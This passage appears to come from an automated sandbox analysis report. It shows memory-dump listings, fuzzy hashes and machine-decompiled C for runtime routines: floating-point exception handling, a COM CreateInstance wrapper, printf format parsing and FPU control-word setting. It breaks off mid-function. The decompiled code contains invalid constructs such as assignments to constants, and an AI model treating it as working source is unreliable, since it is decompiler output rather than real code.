Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4537436daf01aef9832a459caa5c40c18c06f2c2efdef62206fa801e09e5ddc3
Instruction ID: 04595ad458b410aabbf4886ab3d3ac743062a9061179dbe0451b67aabb0dceff
Opcode Fuzzy Hash: 4537436daf01aef9832a459caa5c40c18c06f2c2efdef62206fa801e09e5ddc3
Instruction Fuzzy Hash: 7B024E71E01219DFDF54CFA9C9806AEB7B1FF48314F298269D929A7384D731AE01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CFAD78, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00CFAD78(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E00CF67D5(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E00CF673B(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00cfad86
0x00cfad8d
0x00cfad92
0x00cfad98
0x00cfad9b
0x00cfada1
0x00cfada6
0x00cfadab
0x00cfadab
0x00cfadb1
0x00cfadb6
0x00cfadbb
0x00cfadbb
0x00cfadc2
0x00cfadc7
0x00cfadcc
0x00cfadcc
0x00cfadd3
0x00cfadd8
0x00cfaddd
0x00cfaddd
0x00cfade4
0x00cfade9
0x00cfadee
0x00cfadee
0x00cfadf6
0x00cfae06
0x00cfae18
0x00cfae2a
0x00cfae3d
0x00cfae4f
0x00cfae57
0x00cfae5c
0x00cfae61
0x00cfae61
0x00cfae68
0x00cfae6d
0x00cfae6d
0x00cfae74
0x00cfae79
0x00cfae79
0x00cfae80
0x00cfae85
0x00cfae85
0x00cfae8c
0x00cfae91
0x00cfae91
0x00cfae9b
0x00cfae9d
0x00cfaed7
0x00cfae9f
0x00cfaea4
0x00cfaec8
0x00cfaed0
0x00cfaec4
0x00cfaec4
0x00cfaeda
0x00cfaee1
0x00cfaee3
0x00cfaf05
0x00cfaf0d
0x00cfaf10
0x00cfaf10
0x00cfaf12
0x00cfaf12
0x00cfaf1d
0x00cfaf23
0x00cfaf28
0x00cfaf2f
0x00cfaf69
0x00cfaf74
0x00cfaf7a
0x00cfaf7d
0x00cfaf80
0x00cfaf8c
0x00cfaf94
0x00cfaf31
0x00cfaf34
0x00cfaf40
0x00cfaf46
0x00cfaf4c
0x00cfaf4f
0x00cfaf58
0x00cfaf58
0x00cfaf97
0x00cfafa5
0x00cfafab
0x00cfafae
0x00cfafb3
0x00cfafb5
0x00cfafb8
0x00cfafb8
0x00cfafbd
0x00cfafbf
0x00cfafc2
0x00cfafc2
0x00cfafc7
0x00cfafc9
0x00cfafcc
0x00cfafcc
0x00cfafd1
0x00cfafd3
0x00cfafd6
0x00cfafd6
0x00cfafdb
0x00cfafdd
0x00cfafdd
0x00cfafea
0x00cfafed
0x00cfb024
0x00cfafef
0x00cfafef
0x00cfaff2
0x00cfb01d
0x00cfb012
0x00cfb012
0x00cfb026
0x00cfb02e
0x00cfb031
0x00cfb050
0x00cfb055
0x00cfb055
0x00cfb057
0x00cfb05c
0x00cfb068
0x00cfb05e
0x00cfb061
0x00cfb061
0x00cfb06d
0x00cfb06d
0x00cfb033
0x00cfb036
0x00cfb045
0x00000000
0x00cfb045
0x00cfb038
0x00cfb03b
0x00cfb03d
0x00cfb03d
0x00000000
0x00cfb03b
0x00cfaff4
0x00cfaff7
0x00cfb00d
0x00000000
0x00cfb00d
0x00cfaffc
0x00cfaffe
0x00cfaffe
0x00cfaffc
0x00000000
0x00cfafed
0x00cfaeea
0x00cfaef8
0x00cfaf00
0x00000000
0x00cfaf00
0x00cfaeee
0x00cfaef3
0x00cfaef3
0x00000000
0x00cfaeee
0x00cfaeab
0x00cfaeb9
0x00cfaec1
0x00000000
0x00cfaec1
0x00cfaeaf
0x00cfaeb4
0x00cfaeb4
0x00cfaeaf

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CFAD73,?,?,00000008,?,?,00CFA8F2,00000000), ref: 00CFAFA5

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 185cd2c33b6cb5d25c3f9ad1c2381bda78503610601a4b4c3dc2e3ed0850f0e4
Instruction ID: 77a28236a2f2df42f4baea04578c60dd374380377da7643c84b5c670ff5fa111
Opcode Fuzzy Hash: 185cd2c33b6cb5d25c3f9ad1c2381bda78503610601a4b4c3dc2e3ed0850f0e4
Instruction Fuzzy Hash: EDB170B1210609CFD754CF28C486B65BBE0FF05364F258658E9AACF2A1C735EE91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00CB249C, Relevance: 1.5, APIs: 1, Instructions: 35
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CB249C(void* __ecx, intOrPtr* _a4) {
				void* _t4;
				intOrPtr* _t8;
				intOrPtr* _t11;
				intOrPtr* _t14;
				void* _t17;

				_t8 = _a4;
				if(_t8 != 0) {
					_t17 = 0;
					_t14 = __ecx + 0x28;
					if( *_t14 != 0) {
						L4:
						 *_t8 =  *_t14;
						_t11 =  *_t14;
						 *((intOrPtr*)( *_t11 + 4))(_t11);
						L5:
						return _t17;
					}
					__imp__CoCreateInstance(0xcfe8f0, 0, 1, 0xd085fc, _t14);
					_t17 = _t4;
					if(_t17 < 0) {
						goto L5;
					}
					goto L4;
				}
				return 0x80004003;
			}

0x00cb24a0
0x00cb24a5
0x00cb24b0
0x00cb24b2
0x00cb24b7
0x00cb24d3
0x00cb24d5
0x00cb24d7
0x00cb24dc
0x00cb24df
0x00000000
0x00cb24e2
0x00cb24c7
0x00cb24cd
0x00cb24d1
0x00000000
0x00000000
0x00000000
0x00cb24d1
0x00000000

APIs

CoCreateInstance.OLE32(00CFE8F0,00000000,00000001,00D085FC,?), ref: 00CB24C7

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 25d936bf99d08552fc12053a16a28fe2bd62d010c092b8bfa11c1aaafbe98784
Instruction ID: 22a35aa61c30f54bc0eeb18760ac564b815332870a822597b7001b5337262f01
Opcode Fuzzy Hash: 25d936bf99d08552fc12053a16a28fe2bd62d010c092b8bfa11c1aaafbe98784
Instruction Fuzzy Hash: 9FF08272300235ABC3215A4AEC84E97FB69EF95BA0B104169FA08AB650C7709D80CEE1

Uniqueness

Uniqueness Score: -1.00%

Function 00CD401C, Relevance: 1.5, Strings: 1, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00CD401C(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed char _t56;
				signed char _t58;
				signed int _t59;
				void* _t61;
				signed char _t66;
				signed char _t69;
				signed char _t76;
				signed char _t78;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				unsigned int _t89;
				signed int _t90;
				signed int* _t91;
				void* _t93;
				signed int _t95;
				unsigned int _t97;
				signed char _t99;
				void* _t107;
				intOrPtr _t110;
				void* _t114;
				intOrPtr* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t117 = __ecx;
				_t93 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t122 = _t51 - 0x64;
				if(_t122 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E00CD939F(_t117);
							L10:
							if(_t53 != 0) {
								__eflags =  *(_t117 + 0x30);
								if( *(_t117 + 0x30) != 0) {
									L70:
									_t54 = 1;
									L71:
									return _t54;
								}
								_t95 = 0;
								_v8 = 0;
								_v6 = 0;
								_t89 =  *(_t117 + 0x20);
								_v12 = 0;
								_t56 = _t89 >> 4;
								__eflags = 1 & _t56;
								if((1 & _t56) == 0) {
									L45:
									_t110 =  *((intOrPtr*)(_t117 + 0x31));
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L47:
										_t58 = _t89 >> 5;
										__eflags = _t58 & 0x00000001;
										if((_t58 & 0x00000001) == 0) {
											L49:
											_t90 = 0;
											__eflags = 0;
											L50:
											__eflags = _t110 - 0x61;
											if(_t110 == 0x61) {
												L53:
												_t59 = 1;
												L54:
												__eflags = _t90;
												if(_t90 != 0) {
													L56:
													 *((char*)(_t119 + _t95 - 4)) = 0x30;
													__eflags = _t110 - 0x58;
													if(_t110 == 0x58) {
														L59:
														0x78 = 0x58;
														L60:
														 *((char*)(_t119 + _t95 - 3)) = 0x78;
														_t95 = _t95 + 2;
														__eflags = _t95;
														_v12 = _t95;
														L61:
														_t91 = _t117 + 0x18;
														_t61 = _t117 + 0x448;
														_t114 =  *((intOrPtr*)(_t117 + 0x24)) -  *((intOrPtr*)(_t117 + 0x38)) - _t95;
														__eflags =  *(_t117 + 0x20) & 0x0000000c;
														if(( *(_t117 + 0x20) & 0x0000000c) == 0) {
															E00CCEC82(_t61, 0x20, _t114, _t91);
															_t95 = _v12;
															_t120 = _t120 + 0x10;
														}
														_push(_t117 + 0xc);
														E00CDB586(_t117 + 0x448,  &_v8, _t95, _t91);
														_t97 =  *(_t117 + 0x20);
														_t66 = _t97 >> 3;
														__eflags = _t66 & 0x00000001;
														if((_t66 & 0x00000001) != 0) {
															_t99 = _t97 >> 2;
															__eflags = _t99 & 0x00000001;
															if((_t99 & 0x00000001) == 0) {
																E00CCEC82(_t117 + 0x448, 0x30, _t114, _t91);
																_t120 = _t120 + 0x10;
															}
														}
														E00CDAFB5(_t91, _t117, _t114, _t117, 0);
														__eflags =  *_t91;
														if( *_t91 >= 0) {
															_t69 =  *(_t117 + 0x20) >> 2;
															__eflags = _t69 & 0x00000001;
															if((_t69 & 0x00000001) != 0) {
																E00CCEC82(_t117 + 0x448, 0x20, _t114, _t91);
															}
														}
														goto L70;
													}
													__eflags = _t110 - 0x41;
													if(_t110 == 0x41) {
														goto L59;
													}
													goto L60;
												}
												__eflags = _t59;
												if(_t59 == 0) {
													goto L61;
												}
												goto L56;
											}
											__eflags = _t110 - 0x41;
											if(_t110 == 0x41) {
												goto L53;
											}
											_t59 = 0;
											goto L54;
										}
										_t90 = 1;
										goto L50;
									}
									__eflags = _t110 - 0x58;
									if(_t110 != 0x58) {
										goto L49;
									}
									goto L47;
								}
								_t76 = _t89 >> 6;
								__eflags = 1 & _t76;
								if((1 & _t76) == 0) {
									__eflags = 1 & _t89;
									if((1 & _t89) == 0) {
										_t78 = _t89 >> 1;
										__eflags = 1 & _t78;
										if((1 & _t78) != 0) {
											_v8 = 0x20;
											_t95 = 1;
											_v12 = 1;
										}
										goto L45;
									}
									_v8 = 0x2b;
									L42:
									_t95 = 1;
									_v12 = 1;
									goto L45;
								}
								_v8 = 0x2d;
								goto L42;
							}
							L11:
							_t54 = 0;
							goto L71;
						}
						_t80 = _t52;
						__eflags = _t80;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E00CD7D14(_t117, _t107, __eflags);
							goto L10;
						}
						__eflags = _t80 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E00CD9167(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E00CD6354(0, _t117);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t117 + 0x20;
						 *_t2 =  *(_t117 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E00CD8B28(__ecx, _t107);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E00CD9008(__ecx);
					goto L10;
				}
				if(_t122 == 0) {
					goto L27;
				}
				_t123 = _t51 - _t93;
				if(_t123 > 0) {
					_t82 = _t51 - 0x5a;
					__eflags = _t82;
					if(_t82 == 0) {
						_t53 = E00CD5A6F(__ecx);
						goto L10;
					}
					_t83 = _t82 - 7;
					__eflags = _t83;
					if(_t83 == 0) {
						goto L30;
					}
					__eflags = _t83;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E00CD72A5(0, _t117, __eflags, 0);
					goto L10;
				}
				if(_t123 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00cd4021
0x00cd4022
0x00cd4025
0x00cd402b
0x00cd402c
0x00cd4030
0x00cd4033
0x00cd40a1
0x00cd40a4
0x00cd40f3
0x00cd40f3
0x00cd40f6
0x00cd4062
0x00cd4064
0x00cd4069
0x00cd406b
0x00cd4111
0x00cd4114
0x00cd4248
0x00cd4248
0x00cd424a
0x00cd424f
0x00cd424f
0x00cd411a
0x00cd411c
0x00cd4120
0x00cd4125
0x00cd412b
0x00cd412e
0x00cd4131
0x00cd4133
0x00cd4164
0x00cd4164
0x00cd4167
0x00cd416a
0x00cd4171
0x00cd4173
0x00cd4176
0x00cd4178
0x00cd417e
0x00cd417e
0x00cd417e
0x00cd4180
0x00cd4180
0x00cd4183
0x00cd418e
0x00cd418e
0x00cd4190
0x00cd4190
0x00cd4192
0x00cd4198
0x00cd4198
0x00cd419d
0x00cd41a0
0x00cd41ab
0x00cd41ad
0x00cd41ae
0x00cd41ae
0x00cd41b2
0x00cd41b2
0x00cd41b5
0x00cd41b8
0x00cd41bc
0x00cd41c2
0x00cd41c8
0x00cd41ca
0x00cd41ce
0x00cd41d5
0x00cd41da
0x00cd41dd
0x00cd41dd
0x00cd41e3
0x00cd41f0
0x00cd41f5
0x00cd41fa
0x00cd41fd
0x00cd41ff
0x00cd4201
0x00cd4204
0x00cd4207
0x00cd4214
0x00cd4219
0x00cd4219
0x00cd4207
0x00cd4220
0x00cd4225
0x00cd4228
0x00cd422d
0x00cd4230
0x00cd4232
0x00cd423f
0x00cd4244
0x00cd4232
0x00000000
0x00cd4247
0x00cd41a2
0x00cd41a5
0x00000000
0x00000000
0x00000000
0x00cd41a7
0x00cd4194
0x00cd4196
0x00000000
0x00000000
0x00000000
0x00cd4196
0x00cd4185
0x00cd4188
0x00000000
0x00000000
0x00cd418a
0x00000000
0x00cd418a
0x00cd417a
0x00000000
0x00cd417a
0x00cd416c
0x00cd416f
0x00000000
0x00000000
0x00000000
0x00cd416f
0x00cd4137
0x00cd413a
0x00cd413c
0x00cd4144
0x00cd4146
0x00cd4155
0x00cd4157
0x00cd4159
0x00cd415b
0x00cd415f
0x00cd4161
0x00cd4161
0x00000000
0x00cd4159
0x00cd4148
0x00cd414c
0x00cd414c
0x00cd414e
0x00000000
0x00cd414e
0x00cd413e
0x00000000
0x00cd413e
0x00cd4071
0x00cd4071
0x00000000
0x00cd4071
0x00cd40fd
0x00cd40fd
0x00cd4100
0x00cd40d2
0x00cd40d2
0x00cd40d3
0x00cd40d5
0x00cd40d7
0x00000000
0x00cd40d7
0x00cd4102
0x00cd4105
0x00000000
0x00000000
0x00cd410b
0x00cd407a
0x00cd407a
0x00000000
0x00cd407a
0x00cd40a6
0x00cd40e9
0x00000000
0x00cd40e9
0x00cd40a8
0x00cd40ab
0x00cd40de
0x00cd40e0
0x00000000
0x00cd40e0
0x00cd40ad
0x00cd40b0
0x00cd40ce
0x00cd40ce
0x00cd40ce
0x00cd40ce
0x00000000
0x00cd40ce
0x00cd40b2
0x00cd40b5
0x00cd40c7
0x00000000
0x00cd40c7
0x00cd40b7
0x00cd40ba
0x00000000
0x00000000
0x00cd40be
0x00000000
0x00cd40be
0x00cd4035
0x00000000
0x00000000
0x00cd403b
0x00cd403d
0x00cd407e
0x00cd407e
0x00cd4081
0x00cd409a
0x00000000
0x00cd409a
0x00cd4083
0x00cd4083
0x00cd4086
0x00000000
0x00000000
0x00cd4089
0x00cd408c
0x00000000
0x00000000
0x00cd408e
0x00cd4091
0x00000000
0x00cd4091
0x00cd403f
0x00cd4078
0x00000000
0x00cd4078
0x00cd4044
0x00000000
0x00000000
0x00cd404d
0x00000000
0x00000000
0x00cd4052
0x00000000
0x00000000
0x00cd4057
0x00000000
0x00000000
0x00cd4060
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 00CD4198

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ef8229ed2785ce196a3e473ed4a9da65421e5a214123bc37057837937abbb6bc
Instruction ID: 0bc6bc5924ac39b6ea9176a57f3181b99a9eca78de369b35e2320aa2a7698ecf
Opcode Fuzzy Hash: ef8229ed2785ce196a3e473ed4a9da65421e5a214123bc37057837937abbb6bc
Instruction Fuzzy Hash: 75518A7020074897DF3C9A6988967BE6B999B62300F14011FE7A6D7792C771FF88D352

Uniqueness

Uniqueness Score: -1.00%

Function 00CF9354, Relevance: .1, Instructions: 105
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00CF9354(unsigned int _a4) {
				signed int _v8;
				signed int _v32;
				void _v36;
				signed int _t56;
				signed int _t59;
				unsigned int _t61;
				unsigned int _t63;
				signed int _t70;
				signed int _t81;
				void* _t101;

				_t61 = _a4;
				_t68 = _t61 >> 0x00000010 & 0x0000003f;
				_t70 = 7;
				memset( &_v36, 0, _t70 << 2);
				asm("fnstenv [ebp-0x20]");
				_v32 = _v32 ^ (_v32 ^ ((_t61 >> 0x00000010 & 1) << 0x00000005 | ((_t61 >> 0x00000010 & 0x0000003f) >> 0x00000001 & 1) << 0x00000004 | (_t68 >> 0x00000002 & 1) << 0x00000003 | (_t68 >> 0x00000003 & 1) << 0x00000002 | _t68 >> 0x00000004 & 1 | (_t68 >> 0x00000005 & 1) + (_t68 >> 0x00000005 & 1))) & 0x0000003f;
				asm("fldenv [ebp-0x20]");
				_t63 = _t61 >> 0x00000018 & 0x0000003f;
				_t56 = (_t63 >> 0x00000005 & 1) + (_t63 >> 0x00000005 & 1);
				_t81 = (_t63 & 1) << 0x00000005 | (_t63 >> 0x00000001 & 1) << 0x00000004 | (_t63 >> 0x00000002 & 1) << 0x00000003 | (_t63 >> 0x00000003 & 1) << 0x00000002 | _t63 >> 0x00000004 & 1 | _t56;
				_t101 =  *0xe394b8 - 1; // 0x5
				if(_t101 >= 0) {
					asm("stmxcsr dword [ebp-0x4]");
					_t59 = _v8 & 0xffffffc0 | _t81 & 0x0000003f;
					_v8 = _t59;
					asm("ldmxcsr dword [ebp-0x4]");
					return _t59;
				}
				return _t56;
			}

0x00cf935f
0x00cf9367
0x00cf93bf
0x00cf93c0
0x00cf93c2
0x00cf93d1
0x00cf93d4
0x00cf93da
0x00cf9424
0x00cf9427
0x00cf9429
0x00cf9431
0x00cf9433
0x00cf9440
0x00cf9442
0x00cf9445
0x00000000
0x00cf9445
0x00cf944c

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4763d9ca53063c6dd157d6caf2b5e416c99ca5a92039019ab6ff82079d970e1
Instruction ID: 0aed6db3ddec771727b094b3b294df55778d8e3b3ddf1b11cacc7f57571c73ef
Opcode Fuzzy Hash: d4763d9ca53063c6dd157d6caf2b5e416c99ca5a92039019ab6ff82079d970e1
Instruction Fuzzy Hash: 0021B673F204384B7B0CC47E8C562BDB6E1C78C601745427AF9A6EA3C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00CF9230, Relevance: .1, Instructions: 82
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00CF9230(void* __ecx) {
				signed int _v8;
				signed int _v12;
				unsigned int _t55;
				signed int _t70;
				void* _t72;

				_v8 = 0;
				asm("fnstsw word [ebp-0x4]");
